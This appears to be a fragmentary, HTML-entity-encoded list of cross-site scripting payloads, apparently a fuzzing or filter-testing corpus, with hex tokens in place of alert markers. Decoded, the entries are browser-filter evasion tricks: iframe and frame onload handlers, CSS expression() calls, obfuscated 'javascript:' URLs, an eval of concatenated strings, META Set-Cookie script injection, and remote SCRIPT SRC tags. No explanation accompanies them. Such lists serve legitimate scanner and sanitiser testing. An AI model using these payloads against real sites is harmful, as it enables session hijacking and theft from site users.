&amp;#49&amp;#52&amp;#50&amp;#57&amp;#50&amp;#54&amp;#97&amp;#50&amp;#100&amp;#102&amp;#50&amp;#57&amp;#97&amp;#102&amp;#99&amp;#48&amp;#54&amp;#56&amp;#50&amp;#56&amp;#55&amp;#48&amp;#50&amp;#48&amp;#56&amp;#99&amp;#49&amp;#101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8&amp;#73&amp;#86&amp;#32&amp;#83&amp;#84&amp;#89&amp;#76&amp;#69&amp;#61&amp;#34&amp;#98&amp;#97&amp;#99&amp;#107&amp;#103&amp;#114&amp;#111&amp;#117&amp;#110&amp;#100&amp;#45&amp;#105&amp;#109&amp;#97&amp;#103&amp;#101&amp;#58&amp;#32&amp;#117&amp;#114&amp;#108&amp;#40&amp;#102&amp;#100&amp;#57&amp;#50&amp;#102&amp;#48&amp;#101&amp;#101&amp;#51&amp;#55&amp;#102&amp;#52&amp;#54&amp;#101&amp;#55&amp;#102&amp;#97&amp;#53&amp;#50&amp;#101&amp;#55&amp;#56&amp;#50&amp;#51&amp;#55&amp;#97&amp;#57&amp;#53&amp;#57&amp;#57&amp;#97&amp;#50&amp;#41&amp;#5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8&amp;#73&amp;#86&amp;#32&amp;#83&amp;#84&amp;#89&amp;#76&amp;#69&amp;#61&amp;#34&amp;#119&amp;#105&amp;#100&amp;#116&amp;#104&amp;#58&amp;#32&amp;#101&amp;#120&amp;#112&amp;#114&amp;#101&amp;#115&amp;#115&amp;#105&amp;#111&amp;#110&amp;#40&amp;#51&amp;#54&amp;#52&amp;#97&amp;#54&amp;#50&amp;#54&amp;#97&amp;#101&amp;#98&amp;#100&amp;#54&amp;#56&amp;#53&amp;#51&amp;#57&amp;#101&amp;#100&amp;#48&amp;#50&amp;#55&amp;#51&amp;#99&amp;#50&amp;#57&amp;#57&amp;#100&amp;#99&amp;#48&amp;#49&amp;#57&amp;#102&amp;#41&amp;#5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0&amp;#82&amp;#65&amp;#77&amp;#69&amp;#32&amp;#83&amp;#82&amp;#67&amp;#61&amp;#34&amp;#50&amp;#49&amp;#50&amp;#48&amp;#102&amp;#55&amp;#56&amp;#48&amp;#99&amp;#100&amp;#98&amp;#54&amp;#97&amp;#56&amp;#53&amp;#50&amp;#53&amp;#101&amp;#97&amp;#102&amp;#55&amp;#54&amp;#55&amp;#57&amp;#102&amp;#55&amp;#54&amp;#54&amp;#53&amp;#48&amp;#56&amp;#57&amp;#34&amp;#62&amp;#60&amp;#47&amp;#73&amp;#70&amp;#82&amp;#65&amp;#77&amp;#69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02&amp;#114&amp;#97&amp;#109&amp;#101&amp;#47&amp;#32&amp;#47&amp;#111&amp;#110&amp;#108&amp;#111&amp;#97&amp;#100&amp;#61&amp;#57&amp;#99&amp;#49&amp;#102&amp;#102&amp;#101&amp;#99&amp;#100&amp;#98&amp;#52&amp;#51&amp;#48&amp;#49&amp;#51&amp;#52&amp;#98&amp;#97&amp;#53&amp;#55&amp;#54&amp;#101&amp;#52&amp;#50&amp;#51&amp;#53&amp;#57&amp;#97&amp;#50&amp;#50&amp;#53&amp;#99&amp;#49&amp;#62&amp;#60&amp;#47&amp;#105&amp;#102&amp;#114&amp;#97&amp;#109&amp;#101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02&amp;#114&amp;#97&amp;#109&amp;#101&amp;#47&amp;#32&amp;#34&amp;#111&amp;#110&amp;#108&amp;#111&amp;#97&amp;#100&amp;#61&amp;#98&amp;#98&amp;#53&amp;#53&amp;#100&amp;#101&amp;#49&amp;#102&amp;#49&amp;#49&amp;#53&amp;#53&amp;#97&amp;#54&amp;#50&amp;#99&amp;#53&amp;#100&amp;#51&amp;#53&amp;#99&amp;#57&amp;#53&amp;#51&amp;#51&amp;#101&amp;#50&amp;#100&amp;#57&amp;#50&amp;#53&amp;#54&amp;#62&amp;#60&amp;#47&amp;#105&amp;#102&amp;#114&amp;#97&amp;#109&amp;#101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02&amp;#114&amp;#97&amp;#109&amp;#101&amp;#47&amp;#47&amp;#47&amp;#47&amp;#47&amp;#47&amp;#47&amp;#111&amp;#110&amp;#108&amp;#111&amp;#97&amp;#100&amp;#61&amp;#57&amp;#100&amp;#54&amp;#55&amp;#48&amp;#49&amp;#101&amp;#48&amp;#56&amp;#50&amp;#53&amp;#51&amp;#53&amp;#57&amp;#56&amp;#57&amp;#98&amp;#97&amp;#99&amp;#54&amp;#55&amp;#52&amp;#102&amp;#56&amp;#54&amp;#57&amp;#98&amp;#97&amp;#53&amp;#101&amp;#49&amp;#102&amp;#62&amp;#60&amp;#47&amp;#105&amp;#102&amp;#114&amp;#97&amp;#109&amp;#101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02&amp;#114&amp;#97&amp;#109&amp;#101&amp;#32&amp;#34&amp;#111&amp;#110&amp;#108&amp;#111&amp;#97&amp;#100&amp;#61&amp;#53&amp;#99&amp;#98&amp;#102&amp;#53&amp;#102&amp;#51&amp;#100&amp;#98&amp;#50&amp;#55&amp;#101&amp;#102&amp;#101&amp;#52&amp;#57&amp;#98&amp;#55&amp;#102&amp;#100&amp;#53&amp;#55&amp;#53&amp;#55&amp;#49&amp;#97&amp;#98&amp;#52&amp;#55&amp;#49&amp;#99&amp;#102&amp;#62&amp;#60&amp;#47&amp;#105&amp;#102&amp;#114&amp;#97&amp;#109&amp;#101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02&amp;#114&amp;#97&amp;#109&amp;#101&amp;#47&amp;#32&amp;#34&amp;#111&amp;#110&amp;#108&amp;#111&amp;#97&amp;#100&amp;#61&amp;#54&amp;#50&amp;#102&amp;#51&amp;#54&amp;#48&amp;#51&amp;#99&amp;#100&amp;#102&amp;#98&amp;#97&amp;#48&amp;#52&amp;#53&amp;#53&amp;#56&amp;#99&amp;#57&amp;#101&amp;#54&amp;#50&amp;#57&amp;#101&amp;#99&amp;#97&amp;#102&amp;#98&amp;#56&amp;#53&amp;#49&amp;#53&amp;#62&amp;#60&amp;#47&amp;#105&amp;#102&amp;#114&amp;#97&amp;#109&amp;#101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02&amp;#114&amp;#97&amp;#109&amp;#101&amp;#60&amp;#63&amp;#112&amp;#104&amp;#112&amp;#32&amp;#101&amp;#99&amp;#104&amp;#111&amp;#32&amp;#99&amp;#104&amp;#114&amp;#40&amp;#49&amp;#49&amp;#41&amp;#63&amp;#62&amp;#32&amp;#111&amp;#110&amp;#108&amp;#111&amp;#97&amp;#100&amp;#61&amp;#55&amp;#56&amp;#54&amp;#56&amp;#57&amp;#97&amp;#101&amp;#57&amp;#49&amp;#98&amp;#55&amp;#100&amp;#49&amp;#97&amp;#101&amp;#100&amp;#54&amp;#50&amp;#54&amp;#48&amp;#48&amp;#54&amp;#55&amp;#98&amp;#101&amp;#54&amp;#48&amp;#49&amp;#54&amp;#49&amp;#50&amp;#98&amp;#62&amp;#60&amp;#47&amp;#105&amp;#102&amp;#114&amp;#97&amp;#109&amp;#101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02&amp;#114&amp;#97&amp;#109&amp;#101&amp;#60&amp;#63&amp;#112&amp;#104&amp;#112&amp;#32&amp;#101&amp;#99&amp;#104&amp;#111&amp;#32&amp;#99&amp;#104&amp;#114&amp;#40&amp;#49&amp;#50&amp;#41&amp;#63&amp;#62&amp;#32&amp;#111&amp;#110&amp;#108&amp;#111&amp;#97&amp;#100&amp;#61&amp;#102&amp;#50&amp;#51&amp;#49&amp;#101&amp;#54&amp;#100&amp;#51&amp;#52&amp;#49&amp;#53&amp;#55&amp;#54&amp;#101&amp;#55&amp;#100&amp;#101&amp;#49&amp;#99&amp;#97&amp;#102&amp;#50&amp;#100&amp;#48&amp;#97&amp;#52&amp;#55&amp;#49&amp;#56&amp;#50&amp;#55&amp;#97&amp;#62&amp;#60&amp;#47&amp;#105&amp;#102&amp;#114&amp;#97&amp;#109&amp;#101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0&amp;#82&amp;#65&amp;#77&amp;#69&amp;#83&amp;#69&amp;#84&amp;#62&amp;#60&amp;#70&amp;#82&amp;#65&amp;#77&amp;#69&amp;#32&amp;#83&amp;#82&amp;#67&amp;#61&amp;#34&amp;#101&amp;#48&amp;#53&amp;#51&amp;#53&amp;#101&amp;#57&amp;#100&amp;#53&amp;#99&amp;#57&amp;#55&amp;#55&amp;#57&amp;#48&amp;#52&amp;#51&amp;#50&amp;#101&amp;#49&amp;#52&amp;#49&amp;#52&amp;#55&amp;#48&amp;#51&amp;#52&amp;#101&amp;#55&amp;#97&amp;#55&amp;#101&amp;#34&amp;#62&amp;#60&amp;#47&amp;#70&amp;#82&amp;#65&amp;#77&amp;#69&amp;#83&amp;#69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4&amp;#65&amp;#66&amp;#76&amp;#69&amp;#32&amp;#66&amp;#65&amp;#67&amp;#75&amp;#71&amp;#82&amp;#79&amp;#85&amp;#78&amp;#68&amp;#61&amp;#34&amp;#99&amp;#51&amp;#101&amp;#54&amp;#102&amp;#101&amp;#101&amp;#51&amp;#102&amp;#49&amp;#50&amp;#48&amp;#97&amp;#99&amp;#56&amp;#50&amp;#49&amp;#49&amp;#50&amp;#53&amp;#98&amp;#101&amp;#50&amp;#100&amp;#52&amp;#102&amp;#51&amp;#102&amp;#50&amp;#56&amp;#100&amp;#48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4&amp;#65&amp;#66&amp;#76&amp;#69&amp;#62&amp;#60&amp;#84&amp;#68&amp;#32&amp;#66&amp;#65&amp;#67&amp;#75&amp;#71&amp;#82&amp;#79&amp;#85&amp;#78&amp;#68&amp;#61&amp;#34&amp;#48&amp;#99&amp;#48&amp;#99&amp;#52&amp;#98&amp;#57&amp;#53&amp;#57&amp;#98&amp;#100&amp;#50&amp;#50&amp;#55&amp;#102&amp;#97&amp;#100&amp;#57&amp;#49&amp;#51&amp;#49&amp;#57&amp;#52&amp;#56&amp;#48&amp;#99&amp;#55&amp;#99&amp;#54&amp;#57&amp;#98&amp;#57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8&amp;#73&amp;#86&amp;#32&amp;#83&amp;#84&amp;#89&amp;#76&amp;#69&amp;#61&amp;#34&amp;#98&amp;#97&amp;#99&amp;#107&amp;#103&amp;#114&amp;#111&amp;#117&amp;#110&amp;#100&amp;#45&amp;#105&amp;#109&amp;#97&amp;#103&amp;#101&amp;#58&amp;#32&amp;#117&amp;#114&amp;#108&amp;#40&amp;#38&amp;#35&amp;#49&amp;#59&amp;#100&amp;#49&amp;#49&amp;#102&amp;#48&amp;#50&amp;#52&amp;#101&amp;#52&amp;#102&amp;#55&amp;#97&amp;#97&amp;#54&amp;#101&amp;#56&amp;#99&amp;#101&amp;#50&amp;#57&amp;#51&amp;#100&amp;#48&amp;#100&amp;#49&amp;#53&amp;#53&amp;#102&amp;#57&amp;#49&amp;#98&amp;#48&amp;#41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8&amp;#73&amp;#86&amp;#32&amp;#83&amp;#84&amp;#89&amp;#76&amp;#69&amp;#61&amp;#34&amp;#119&amp;#105&amp;#100&amp;#116&amp;#104&amp;#58&amp;#32&amp;#101&amp;#120&amp;#112&amp;#114&amp;#101&amp;#115&amp;#115&amp;#105&amp;#111&amp;#110&amp;#40&amp;#54&amp;#48&amp;#53&amp;#97&amp;#57&amp;#56&amp;#101&amp;#97&amp;#99&amp;#56&amp;#57&amp;#102&amp;#53&amp;#54&amp;#51&amp;#102&amp;#57&amp;#99&amp;#102&amp;#102&amp;#56&amp;#57&amp;#101&amp;#101&amp;#49&amp;#56&amp;#98&amp;#99&amp;#102&amp;#101&amp;#49&amp;#56&amp;#41&amp;#5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4&amp;#89&amp;#76&amp;#69&amp;#61&amp;#34&amp;#120&amp;#115&amp;#115&amp;#58&amp;#101&amp;#120&amp;#112&amp;#114&amp;#47&amp;#42&amp;#102&amp;#97&amp;#101&amp;#57&amp;#102&amp;#54&amp;#101&amp;#51&amp;#57&amp;#51&amp;#101&amp;#54&amp;#98&amp;#49&amp;#101&amp;#98&amp;#49&amp;#52&amp;#57&amp;#100&amp;#98&amp;#50&amp;#57&amp;#55&amp;#99&amp;#101&amp;#52&amp;#48&amp;#52&amp;#99&amp;#50&amp;#48&amp;#42&amp;#47&amp;#101&amp;#115&amp;#115&amp;#105&amp;#111&amp;#110&amp;#40&amp;#102&amp;#97&amp;#101&amp;#57&amp;#102&amp;#54&amp;#101&amp;#51&amp;#57&amp;#51&amp;#101&amp;#54&amp;#98&amp;#49&amp;#101&amp;#98&amp;#49&amp;#52&amp;#57&amp;#100&amp;#98&amp;#50&amp;#57&amp;#55&amp;#99&amp;#101&amp;#52&amp;#48&amp;#52&amp;#99&amp;#50&amp;#48&amp;#41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48&amp;#50&amp;#51&amp;#51&amp;#54&amp;#100&amp;#52&amp;#54&amp;#48&amp;#97&amp;#53&amp;#48&amp;#51&amp;#54&amp;#56&amp;#56&amp;#54&amp;#51&amp;#51&amp;#56&amp;#102&amp;#50&amp;#97&amp;#57&amp;#57&amp;#100&amp;#54&amp;#49&amp;#56&amp;#97&amp;#101&amp;#54&amp;#32&amp;#83&amp;#84&amp;#89&amp;#76&amp;#69&amp;#61&amp;#34&amp;#120&amp;#115&amp;#115&amp;#58&amp;#101&amp;#120&amp;#112&amp;#114&amp;#101&amp;#115&amp;#115&amp;#105&amp;#111&amp;#110&amp;#40&amp;#48&amp;#50&amp;#51&amp;#51&amp;#54&amp;#100&amp;#52&amp;#54&amp;#48&amp;#97&amp;#53&amp;#48&amp;#51&amp;#54&amp;#56&amp;#56&amp;#54&amp;#51&amp;#51&amp;#56&amp;#102&amp;#50&amp;#97&amp;#57&amp;#57&amp;#100&amp;#54&amp;#49&amp;#56&amp;#97&amp;#101&amp;#54&amp;#41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3&amp;#84&amp;#89&amp;#76&amp;#69&amp;#32&amp;#84&amp;#89&amp;#80&amp;#69&amp;#61&amp;#34&amp;#116&amp;#101&amp;#120&amp;#116&amp;#47&amp;#106&amp;#97&amp;#118&amp;#97&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116&amp;#34&amp;#62&amp;#49&amp;#55&amp;#56&amp;#99&amp;#101&amp;#57&amp;#51&amp;#48&amp;#49&amp;#100&amp;#49&amp;#54&amp;#49&amp;#101&amp;#101&amp;#54&amp;#98&amp;#48&amp;#50&amp;#57&amp;#51&amp;#51&amp;#50&amp;#56&amp;#57&amp;#100&amp;#53&amp;#102&amp;#98&amp;#52&amp;#98&amp;#54&amp;#60&amp;#47&amp;#83&amp;#84&amp;#89&amp;#76&amp;#69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3&amp;#84&amp;#89&amp;#76&amp;#69&amp;#62&amp;#46&amp;#102&amp;#102&amp;#97&amp;#54&amp;#48&amp;#99&amp;#57&amp;#99&amp;#57&amp;#52&amp;#52&amp;#50&amp;#56&amp;#48&amp;#57&amp;#100&amp;#52&amp;#99&amp;#50&amp;#102&amp;#55&amp;#52&amp;#100&amp;#56&amp;#97&amp;#56&amp;#51&amp;#100&amp;#53&amp;#54&amp;#102&amp;#57&amp;#123&amp;#98&amp;#97&amp;#99&amp;#107&amp;#103&amp;#114&amp;#111&amp;#117&amp;#110&amp;#100&amp;#45&amp;#105&amp;#109&amp;#97&amp;#103&amp;#101&amp;#58&amp;#117&amp;#114&amp;#108&amp;#40&amp;#34&amp;#102&amp;#102&amp;#97&amp;#54&amp;#48&amp;#99&amp;#57&amp;#99&amp;#57&amp;#52&amp;#52&amp;#50&amp;#56&amp;#48&amp;#57&amp;#100&amp;#52&amp;#99&amp;#50&amp;#102&amp;#55&amp;#52&amp;#100&amp;#56&amp;#97&amp;#56&amp;#51&amp;#100&amp;#53&amp;#54&amp;#102&amp;#57&amp;#34&amp;#41&amp;#59&amp;#125&amp;#60&amp;#47&amp;#83&amp;#84&amp;#89&amp;#76&amp;#69&amp;#62&amp;#60&amp;#65&amp;#32&amp;#67&amp;#76&amp;#65&amp;#83&amp;#83&amp;#61&amp;#102&amp;#102&amp;#97&amp;#54&amp;#48&amp;#99&amp;#57&amp;#99&amp;#57&amp;#52&amp;#52&amp;#50&amp;#56&amp;#48&amp;#57&amp;#100&amp;#52&amp;#99&amp;#50&amp;#102&amp;#55&amp;#52&amp;#100&amp;#56&amp;#97&amp;#56&amp;#51&amp;#100&amp;#53&amp;#54&amp;#102&amp;#57&amp;#62&amp;#60&amp;#47&amp;#65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3&amp;#84&amp;#89&amp;#76&amp;#69&amp;#32&amp;#116&amp;#121&amp;#112&amp;#101&amp;#61&amp;#34&amp;#116&amp;#101&amp;#120&amp;#116&amp;#47&amp;#99&amp;#115&amp;#115&amp;#34&amp;#62&amp;#66&amp;#79&amp;#68&amp;#89&amp;#123&amp;#98&amp;#97&amp;#99&amp;#107&amp;#103&amp;#114&amp;#111&amp;#117&amp;#110&amp;#100&amp;#58&amp;#117&amp;#114&amp;#108&amp;#40&amp;#34&amp;#97&amp;#54&amp;#55&amp;#100&amp;#54&amp;#99&amp;#102&amp;#56&amp;#98&amp;#102&amp;#99&amp;#56&amp;#97&amp;#57&amp;#48&amp;#102&amp;#54&amp;#102&amp;#53&amp;#99&amp;#57&amp;#97&amp;#99&amp;#48&amp;#54&amp;#51&amp;#102&amp;#56&amp;#48&amp;#48&amp;#98&amp;#55&amp;#34&amp;#41&amp;#125&amp;#60&amp;#47&amp;#83&amp;#84&amp;#89&amp;#76&amp;#69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33&amp;#45&amp;#45&amp;#91&amp;#105&amp;#102&amp;#32&amp;#103&amp;#116&amp;#101&amp;#32&amp;#73&amp;#69&amp;#32&amp;#52&amp;#93&amp;#62&amp;#49&amp;#49&amp;#100&amp;#99&amp;#49&amp;#100&amp;#51&amp;#52&amp;#54&amp;#52&amp;#98&amp;#49&amp;#51&amp;#48&amp;#56&amp;#53&amp;#49&amp;#102&amp;#48&amp;#55&amp;#97&amp;#52&amp;#54&amp;#101&amp;#55&amp;#54&amp;#102&amp;#48&amp;#54&amp;#53&amp;#49&amp;#97&amp;#60&amp;#33&amp;#91&amp;#101&amp;#110&amp;#100&amp;#105&amp;#102&amp;#93&amp;#45&amp;#45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6&amp;#65&amp;#83&amp;#69&amp;#32&amp;#72&amp;#82&amp;#69&amp;#70&amp;#61&amp;#34&amp;#56&amp;#97&amp;#99&amp;#98&amp;#55&amp;#55&amp;#98&amp;#52&amp;#53&amp;#53&amp;#51&amp;#102&amp;#53&amp;#53&amp;#57&amp;#48&amp;#97&amp;#98&amp;#56&amp;#55&amp;#54&amp;#56&amp;#49&amp;#98&amp;#52&amp;#100&amp;#56&amp;#49&amp;#97&amp;#100&amp;#51&amp;#57&amp;#47&amp;#47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9&amp;#66&amp;#74&amp;#69&amp;#67&amp;#84&amp;#32&amp;#99&amp;#108&amp;#97&amp;#115&amp;#115&amp;#105&amp;#100&amp;#61&amp;#99&amp;#108&amp;#115&amp;#105&amp;#100&amp;#58&amp;#97&amp;#101&amp;#50&amp;#52&amp;#102&amp;#100&amp;#97&amp;#101&amp;#45&amp;#48&amp;#51&amp;#99&amp;#54&amp;#45&amp;#49&amp;#49&amp;#100&amp;#49&amp;#45&amp;#56&amp;#98&amp;#55&amp;#54&amp;#45&amp;#48&amp;#48&amp;#56&amp;#48&amp;#99&amp;#55&amp;#52&amp;#52&amp;#102&amp;#51&amp;#56&amp;#57&amp;#62&amp;#60&amp;#112&amp;#97&amp;#114&amp;#97&amp;#109&amp;#32&amp;#110&amp;#97&amp;#109&amp;#101&amp;#61&amp;#117&amp;#114&amp;#108&amp;#32&amp;#118&amp;#97&amp;#108&amp;#117&amp;#101&amp;#61&amp;#98&amp;#53&amp;#101&amp;#56&amp;#55&amp;#52&amp;#57&amp;#51&amp;#97&amp;#55&amp;#101&amp;#99&amp;#99&amp;#98&amp;#50&amp;#57&amp;#100&amp;#49&amp;#57&amp;#54&amp;#48&amp;#101&amp;#54&amp;#51&amp;#54&amp;#102&amp;#52&amp;#102&amp;#57&amp;#51&amp;#99&amp;#54&amp;#62&amp;#60&amp;#47&amp;#79&amp;#66&amp;#74&amp;#69&amp;#67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97&amp;#61&amp;#34&amp;#103&amp;#101&amp;#116&amp;#34&amp;#59&amp;#98&amp;#61&amp;#34&amp;#85&amp;#82&amp;#76&amp;#40&amp;#34&amp;#34&amp;#59&amp;#99&amp;#61&amp;#34&amp;#106&amp;#97&amp;#118&amp;#97&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116&amp;#58&amp;#34&amp;#59&amp;#100&amp;#61&amp;#34&amp;#48&amp;#52&amp;#100&amp;#57&amp;#99&amp;#100&amp;#98&amp;#57&amp;#57&amp;#102&amp;#52&amp;#52&amp;#48&amp;#51&amp;#98&amp;#97&amp;#51&amp;#54&amp;#57&amp;#52&amp;#102&amp;#57&amp;#51&amp;#51&amp;#48&amp;#97&amp;#98&amp;#52&amp;#54&amp;#100&amp;#100&amp;#55&amp;#34&amp;#41&amp;#34&amp;#59&amp;#101&amp;#118&amp;#97&amp;#108&amp;#40&amp;#97&amp;#43&amp;#98&amp;#43&amp;#99&amp;#43&amp;#100&amp;#41&amp;#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3&amp;#32&amp;#101&amp;#99&amp;#104&amp;#111&amp;#40&amp;#39&amp;#60&amp;#83&amp;#67&amp;#82&amp;#41&amp;#39&amp;#59&amp;#101&amp;#99&amp;#104&amp;#111&amp;#40&amp;#39&amp;#73&amp;#80&amp;#84&amp;#62&amp;#97&amp;#102&amp;#53&amp;#50&amp;#100&amp;#53&amp;#99&amp;#57&amp;#52&amp;#51&amp;#50&amp;#50&amp;#97&amp;#56&amp;#52&amp;#100&amp;#98&amp;#100&amp;#53&amp;#98&amp;#97&amp;#52&amp;#49&amp;#51&amp;#57&amp;#97&amp;#100&amp;#98&amp;#101&amp;#100&amp;#56&amp;#98&amp;#60&amp;#47&amp;#83&amp;#67&amp;#82&amp;#73&amp;#80&amp;#84&amp;#62&amp;#39&amp;#41&amp;#59&amp;#32&amp;#63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7&amp;#69&amp;#84&amp;#65&amp;#32&amp;#72&amp;#84&amp;#84&amp;#80&amp;#45&amp;#69&amp;#81&amp;#85&amp;#73&amp;#86&amp;#61&amp;#34&amp;#83&amp;#101&amp;#116&amp;#45&amp;#67&amp;#111&amp;#111&amp;#107&amp;#105&amp;#101&amp;#34&amp;#32&amp;#67&amp;#111&amp;#110&amp;#116&amp;#101&amp;#110&amp;#116&amp;#61&amp;#34&amp;#85&amp;#83&amp;#69&amp;#82&amp;#73&amp;#68&amp;#61&amp;#38&amp;#108&amp;#116&amp;#59&amp;#83&amp;#67&amp;#82&amp;#73&amp;#80&amp;#84&amp;#38&amp;#103&amp;#116&amp;#59&amp;#53&amp;#100&amp;#50&amp;#97&amp;#98&amp;#99&amp;#54&amp;#54&amp;#101&amp;#100&amp;#98&amp;#99&amp;#55&amp;#52&amp;#97&amp;#100&amp;#56&amp;#97&amp;#55&amp;#50&amp;#54&amp;#53&amp;#52&amp;#49&amp;#97&amp;#100&amp;#55&amp;#55&amp;#101&amp;#102&amp;#55&amp;#99&amp;#38&amp;#108&amp;#116&amp;#59&amp;#47&amp;#83&amp;#67&amp;#82&amp;#73&amp;#80&amp;#84&amp;#38&amp;#103&amp;#116&amp;#5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3&amp;#67&amp;#82&amp;#73&amp;#80&amp;#84&amp;#32&amp;#83&amp;#82&amp;#67&amp;#61&amp;#104&amp;#116&amp;#116&amp;#112&amp;#58&amp;#47&amp;#47&amp;#49&amp;#50&amp;#55&amp;#46&amp;#48&amp;#46&amp;#48&amp;#46&amp;#49&amp;#62&amp;#102&amp;#53&amp;#53&amp;#52&amp;#55&amp;#100&amp;#55&amp;#56&amp;#98&amp;#48&amp;#48&amp;#50&amp;#50&amp;#55&amp;#51&amp;#49&amp;#50&amp;#102&amp;#49&amp;#57&amp;#57&amp;#102&amp;#99&amp;#101&amp;#98&amp;#48&amp;#53&amp;#51&amp;#51&amp;#55&amp;#55&amp;#55&amp;#60&amp;#47&amp;#83&amp;#67&amp;#82&amp;#73&amp;#80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34&amp;#38&amp;#49&amp;#52&amp;#59&amp;#106&amp;#97&amp;#118&amp;#97&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116&amp;#58&amp;#50&amp;#100&amp;#56&amp;#48&amp;#99&amp;#50&amp;#101&amp;#48&amp;#57&amp;#56&amp;#50&amp;#98&amp;#51&amp;#53&amp;#49&amp;#51&amp;#101&amp;#53&amp;#101&amp;#57&amp;#48&amp;#100&amp;#56&amp;#48&amp;#57&amp;#98&amp;#57&amp;#49&amp;#50&amp;#97&amp;#55&amp;#52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34&amp;#106&amp;#97&amp;#118&amp;#38&amp;#35&amp;#120&amp;#48&amp;#68&amp;#59&amp;#97&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116&amp;#58&amp;#100&amp;#55&amp;#102&amp;#55&amp;#54&amp;#56&amp;#56&amp;#49&amp;#97&amp;#57&amp;#54&amp;#56&amp;#53&amp;#48&amp;#53&amp;#48&amp;#99&amp;#97&amp;#99&amp;#49&amp;#57&amp;#55&amp;#98&amp;#99&amp;#51&amp;#98&amp;#50&amp;#56&amp;#97&amp;#57&amp;#49&amp;#55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45&amp;#45&amp;#45&amp;#32&amp;#60&amp;#73&amp;#77&amp;#71&amp;#32&amp;#83&amp;#82&amp;#67&amp;#61&amp;#34&amp;#32&amp;#38&amp;#35&amp;#49&amp;#52&amp;#59&amp;#32&amp;#32&amp;#97&amp;#51&amp;#52&amp;#48&amp;#48&amp;#98&amp;#50&amp;#48&amp;#48&amp;#50&amp;#51&amp;#51&amp;#50&amp;#51&amp;#57&amp;#48&amp;#48&amp;#49&amp;#57&amp;#49&amp;#49&amp;#99&amp;#100&amp;#50&amp;#54&amp;#48&amp;#98&amp;#57&amp;#51&amp;#100&amp;#50&amp;#100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45&amp;#45&amp;#45&amp;#32&amp;#60&amp;#73&amp;#77&amp;#71&amp;#32&amp;#83&amp;#82&amp;#67&amp;#61&amp;#34&amp;#50&amp;#55&amp;#98&amp;#102&amp;#50&amp;#52&amp;#49&amp;#49&amp;#57&amp;#50&amp;#100&amp;#48&amp;#51&amp;#55&amp;#101&amp;#51&amp;#51&amp;#51&amp;#102&amp;#51&amp;#99&amp;#48&amp;#102&amp;#52&amp;#101&amp;#49&amp;#55&amp;#48&amp;#101&amp;#49&amp;#101&amp;#102&amp;#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3&amp;#67&amp;#82&amp;#73&amp;#80&amp;#84&amp;#62&amp;#97&amp;#61&amp;#47&amp;#49&amp;#55&amp;#99&amp;#102&amp;#55&amp;#50&amp;#48&amp;#100&amp;#48&amp;#98&amp;#52&amp;#53&amp;#54&amp;#49&amp;#50&amp;#50&amp;#51&amp;#53&amp;#52&amp;#102&amp;#99&amp;#50&amp;#56&amp;#51&amp;#52&amp;#55&amp;#99&amp;#54&amp;#57&amp;#51&amp;#50&amp;#51&amp;#47&amp;#97&amp;#108&amp;#101&amp;#114&amp;#116&amp;#40&amp;#97&amp;#46&amp;#115&amp;#111&amp;#117&amp;#114&amp;#99&amp;#101&amp;#41&amp;#60&amp;#47&amp;#83&amp;#67&amp;#82&amp;#73&amp;#80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45&amp;#45&amp;#45&amp;#32&amp;#34&amp;#59&amp;#57&amp;#57&amp;#53&amp;#101&amp;#52&amp;#98&amp;#49&amp;#50&amp;#57&amp;#50&amp;#54&amp;#52&amp;#53&amp;#102&amp;#52&amp;#53&amp;#57&amp;#55&amp;#54&amp;#51&amp;#57&amp;#52&amp;#100&amp;#49&amp;#53&amp;#102&amp;#49&amp;#48&amp;#48&amp;#102&amp;#49&amp;#52&amp;#59&amp;#47&amp;#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7&amp;#69&amp;#84&amp;#65&amp;#32&amp;#72&amp;#84&amp;#84&amp;#80&amp;#45&amp;#69&amp;#81&amp;#85&amp;#73&amp;#86&amp;#111&amp;#34&amp;#114&amp;#101&amp;#102&amp;#114&amp;#101&amp;#115&amp;#104&amp;#34&amp;#32&amp;#67&amp;#79&amp;#78&amp;#84&amp;#69&amp;#78&amp;#84&amp;#61&amp;#34&amp;#48&amp;#59&amp;#32&amp;#85&amp;#82&amp;#76&amp;#61&amp;#104&amp;#116&amp;#116&amp;#112&amp;#58&amp;#47&amp;#47&amp;#59&amp;#85&amp;#82&amp;#76&amp;#61&amp;#49&amp;#98&amp;#102&amp;#54&amp;#54&amp;#57&amp;#57&amp;#101&amp;#99&amp;#50&amp;#98&amp;#97&amp;#56&amp;#55&amp;#51&amp;#48&amp;#101&amp;#49&amp;#101&amp;#98&amp;#99&amp;#97&amp;#50&amp;#102&amp;#99&amp;#55&amp;#56&amp;#101&amp;#51&amp;#50&amp;#53&amp;#54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3&amp;#67&amp;#82&amp;#73&amp;#80&amp;#84&amp;#32&amp;#60&amp;#66&amp;#62&amp;#61&amp;#49&amp;#50&amp;#48&amp;#55&amp;#55&amp;#49&amp;#50&amp;#51&amp;#53&amp;#52&amp;#52&amp;#99&amp;#53&amp;#50&amp;#57&amp;#102&amp;#51&amp;#101&amp;#101&amp;#102&amp;#52&amp;#99&amp;#97&amp;#52&amp;#57&amp;#101&amp;#100&amp;#48&amp;#100&amp;#49&amp;#101&amp;#51&amp;#34&amp;#62&amp;#60&amp;#47&amp;#83&amp;#67&amp;#82&amp;#73&amp;#80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0&amp;#82&amp;#65&amp;#77&amp;#69&amp;#32&amp;#83&amp;#82&amp;#67&amp;#61&amp;#34&amp;#106&amp;#97&amp;#118&amp;#97&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116&amp;#58&amp;#101&amp;#48&amp;#50&amp;#51&amp;#50&amp;#57&amp;#97&amp;#55&amp;#57&amp;#52&amp;#101&amp;#49&amp;#102&amp;#50&amp;#100&amp;#97&amp;#57&amp;#53&amp;#49&amp;#57&amp;#50&amp;#49&amp;#101&amp;#55&amp;#100&amp;#52&amp;#102&amp;#99&amp;#98&amp;#98&amp;#102&amp;#50&amp;#32&amp;#6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3&amp;#67&amp;#82&amp;#73&amp;#80&amp;#84&amp;#62&amp;#97&amp;#61&amp;#47&amp;#50&amp;#102&amp;#100&amp;#56&amp;#53&amp;#55&amp;#56&amp;#52&amp;#101&amp;#98&amp;#98&amp;#99&amp;#52&amp;#50&amp;#97&amp;#98&amp;#101&amp;#53&amp;#102&amp;#49&amp;#102&amp;#55&amp;#48&amp;#98&amp;#101&amp;#98&amp;#99&amp;#102&amp;#51&amp;#48&amp;#101&amp;#53&amp;#47&amp;#110&amp;#50&